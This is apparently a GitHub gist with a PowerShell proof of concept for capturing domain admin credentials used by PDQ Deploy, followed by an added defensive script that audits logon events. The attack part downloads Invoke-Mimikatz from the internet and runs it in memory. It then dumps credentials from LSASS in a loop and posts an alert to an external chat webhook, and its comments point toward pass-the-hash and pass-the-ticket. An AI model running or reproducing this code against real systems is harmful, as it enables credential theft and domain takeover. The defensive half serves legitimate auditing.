@GarthKiepper
Last active August 31, 2017 20:22
Capture admin credentials from PDQ deploy
# Date: 7/8/17
# Author: Garth Kiepper
# Description: This PowerShell script was created as a proof-of-concept attempting to demonstrate that
# a user with local admin privileges can compromise the credentials used in PDQ deploy. It is
# common for enterprises to use PDQ deploy to push software to endpoint machines, and many
# administrators mistakenly use their domain admin credentials to do this. In the worst case,
# an attacker can compromise the domain. This could be mitigated by using an account with limited
# privileges to push software via PDQ deploy. With this in mind, the attacker can still compromise
# this account but gains fewer privileges as a result. Full mitigation techniques while still
# utilizing PDQ deploy are unknown to the author. For convenience, logins are logged to RocketChat
# in real time.
# Note: although this script has been tested to detect logins, it has not been verified to actually
# compromise an account used for PDQ deploy in a production domain. This testing is planned to be
# performed by the author in the near future. It's also worth noting that no code here is
# specifically oriented towards detecting PDQ deploy logins. In fact, you can use this to detect
# other shoddy forms of software deployment by your domain admins, whether they used PowerShell or
# just happened to log in to your box. This script can also help a user ensure they are the only
# logged-on user.
# Future work:
# This script can be expanded to dump passwords, hashes, and Kerberos tickets for pass-the-hash and
# pass-the-ticket impersonation. This is trivial, and can be accomplished by reading the entire output
# of mimikatz.
# Download Invoke-Mimikatz from PowerSploit and load it into the current session.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')

# Post a message to a Rocket.Chat incoming webhook.
Function Send-To_RocketChat {
    param([string]$messageText)
    $notificationPayload = @{ text = $messageText }
    $uri = 'INSERT ROCKET CHAT HOOK URL HERE'
    Invoke-RestMethod -Uri $uri -Method Post -Body (ConvertTo-Json $notificationPayload) -ContentType 'application/json'
}

# Name of the admin account whose logon should be detected.
$admin = 'INSERT DOMAIN ADMIN USERNAME HERE'

# Repeatedly run mimikatz. Each iteration takes about 16 seconds.
while ($true) {
    $result = Invoke-Mimikatz -DumpCreds | Out-String
    # Match the account name as it appears in the mimikatz output (": <name>").
    if ($result.Contains(": " + $admin)) {
        Send-To_RocketChat -messageText "Detected logon via mimikatz."
    }
}
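As an added, defender-side example that is not part of the gist: the question the loop above asks (has the admin account logged onto this machine?) can be answered from the Security event log instead of from LSASS, and the log also records the logon type, which decides whether reusable credentials were left on the endpoint at all. It assumes success auditing for logon events (event 4624) is enabled and that the account name is a placeholder you replace.

```powershell
# Added example (not part of the gist): audit this endpoint's Security log for logons
# of the deployment/admin account and report the logon type, so a defender can see
# whether the account lands on endpoints in a way that leaves reusable credentials
# in LSASS. Run elevated; requires 'Audit Logon' success auditing (event 4624).

# Logon types whose credentials are normally cached in LSASS on the target:
# 2 Interactive, 4 Batch, 5 Service, 7 Unlock, 10 RemoteInteractive, 11 CachedInteractive.
# Network logons (type 3) do not leave reusable credentials behind.
$CredentialCachingLogonTypes = @(2, 4, 5, 7, 10, 11)

Function Get-PrivilegedLogon {
    param(
        [Parameter(Mandatory)][string]$Account,   # assumed placeholder, e.g. the PDQ Deploy user
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a lookup table.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data['TargetUserName'] -eq $Account) {
            $logonType = [int]$data['LogonType']
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Account     = "$($data['TargetDomainName'])\$($data['TargetUserName'])"
                LogonType   = $logonType
                Source      = $data['IpAddress']
                Process     = $data['ProcessName']
                CachesCreds = ($logonType -in $CredentialCachingLogonTypes)
            }
        }
    }
}

# Usage: list logons of the deployment account in the last 24 hours and keep only
# the ones that expose its credentials on this endpoint.
Get-PrivilegedLogon -Account 'INSERT DOMAIN ADMIN USERNAME HERE' |
    Where-Object CachesCreds |
    Format-Table -AutoSize
```

If the only entries are logon type 3, the deployment account is authenticating over the network and is not leaving credentials on the endpoint; a stream of type 2, 5 or 10 entries is the exposure the gist's header describes.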